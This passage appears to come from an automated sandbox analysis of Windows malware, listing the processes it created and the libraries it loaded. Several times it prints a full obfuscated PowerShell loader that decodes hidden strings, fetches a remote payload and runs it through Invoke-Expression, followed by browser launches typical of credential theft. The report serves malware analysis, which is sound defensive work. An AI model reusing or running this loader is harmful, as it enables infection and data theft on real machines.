atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr83C0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/20442955"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2332,i,10028709547936440876,11237033712603791372,262144 /prefetch:8
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8AD6.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/a1d56f56"
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2040,i,14070715780729818373,9332717717908022524,262144 /prefetch:3
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe"
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr83C0.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/20442955"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr8AD6.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/a52e5cd8/a1d56f56"Jump to behavior
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpshare.exe "C:\Program Files\Windows Media Player\wmpshare.exe"Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2332,i,10028709547936440876,11237033712603791372,262144 /prefetch:8Jump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2040,i,14070715780729818373,9332717717908022524,262144 /prefetch:3Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
